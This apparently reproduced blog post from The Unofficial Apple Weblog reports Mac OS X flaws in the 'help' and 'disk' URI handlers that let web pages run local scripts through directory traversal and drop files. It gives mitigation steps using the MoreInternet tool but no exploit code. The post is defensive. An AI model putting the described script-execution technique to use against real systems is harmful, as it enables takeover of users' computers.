The Unofficial Apple Weblog (TUAW)

Jay Allen and Liz Lawley are talking about a serious security hole in OS X.

Two vulnerabilities have been reported in Mac OS X, allowing malicious web sites to compromise a vulnerable system.

1) The problem is that the “help” URI handler allows execution of arbitrary local scripts (.scpt) via the classic directory traversal character sequence using “help:runscript”.

2) It is reportedly also possible to silently place arbitrary files in a known location, including script files, on a user’s system using the “disk” URI handler.

Various variants of the URI handler vulnerabilities are currently being discussed. This has been confirmed on Macintosh OS X using Safari 1.2.1 (v125.1) and Internet Explorer 5.2. Other browsers may also be used as attack vectors.

NOTE: The rating has been upgraded to “Extremely Critical” because the issues are very easy to exploit and a large number of working exploits are available.

There’s even more details on MacNN, but if you just want to fix it, Liz suggests:

If, like me, you just want to know how to fix this fast (since Apple has apparently known about this since February and hasn’t fixed it, it wouldn’t be wise to wait for their patch), here’s the approach to use.

    1. Download the freeware tool MoreInternet.

    2. From the disk image, run “install prefpane,” which will put the MoreInternet preference panel into your System Preferences panel.

    3. Open the MoreInternet panel, and select the help: protocol.

    4. Change the application it launches from the Help Viewer (which has the script-running vulnerability) to something benign. (I used TextEdit.) I used Chess, which, unlike TextEdit, gives me a clear visual cue that a page tried to invoke the help: protocol.

    5. Make sure it worked by going to the scary but harmless example.

UPDATE

: MacNN is reporting that Apple is taking this very seriously” and is “actively investigating this potential security issue.”